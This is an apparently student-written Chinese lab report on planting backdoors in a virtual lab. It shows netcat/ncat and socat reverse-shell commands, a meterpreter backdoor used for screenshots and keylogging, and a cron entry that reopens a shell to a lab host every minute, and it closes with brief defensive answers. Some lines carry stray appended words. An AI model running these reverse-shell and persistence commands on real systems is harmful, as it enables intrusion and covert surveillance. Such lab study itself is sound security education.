•利用netcat和socat获取靶机shell,并实现任务计划启动;linux
•使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令操做,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装服务等shell
一、如何启动后门?windows
Windows
在控制面板-管理工具-任务计划程序中添加任务,ruby
linux中设置cronbash
二、如何防止被其余人安装后门程序?tcp
防火墙和防病毒软件必须处于打开状态,定时清理垃圾软件和恶意广告,按期进行杀毒软件全盘扫描。工具
三、Meterpreter有哪些给你映像深入的功能?3d
记录键盘输入抓取以及摄像头拍摄功能,很强的监视功能。code
四、例举你能想到的一个后门进入到你系统中的可能方式?blog
浏览网页时,点击弹出的广告下载程序;下载软件时,自动捆绑下载了其余恶意程序。
·首先保证虚拟机与主机之间能PING通。
·而后下载ncat与socat到windows与linux里(linux自带ncat)
(1)windows获取linux的shell
·windows开启监听端口:
·kali发起链接请求:
·Windows得到Linux的Shell
•在windows上打开cmd,并经过ncat开放端口5228
•在linux上反弹链接win:nc 192.168.184.128 5228 -e /bin/sh
(2)Linux得到Windows的Shell
•在linux下设置监听端口:nc -l -p 5228
•在windows下请求链接:ncat 192.168.184.128 5228 -e cmd.exe
•在linux下输入ipconfig查看主机IP:
•windows系统使用ncat.exe -lv 1452 > 5228.exe
监听准备接受文件
•kali系统使用ncat -nv 172.30.3.151 1452 <20145228
来发送指定文件
(1)kali上用socat tcp-listen:5228
把cmd绑定到端口5228
•同時用socat tcp-l:5228 system:bash,pty,stderr
反弹链接
(2)windows使用socat readline tcp:172.30.1.251 5228
开启监听
•使用ifconfig检测
•使用msfconsole命令开启msf进行设置
•监听开始,在windows中运行以前的后门程序能够成功控制远程shell。
•查看系统版本信息
•对靶机进行截图
•记录键盘输入
•安装为系统服务
(1)Windows
•在控制面板-管理工具-任务计划程序中添加任务,编辑触发器等
(2)linux
cron启动
•kali下终端使用crontab -e
修改配置文件
在最后一行后加入* * * * * /bin/ncat 172.30.1.154 5228 -e /bin/sh
*号表明时间
作完这个实验后,了解到了后门程序的植入以及运行方式,使咱们在之后的生活中有着防范后门的意识,具备极大的积极做用。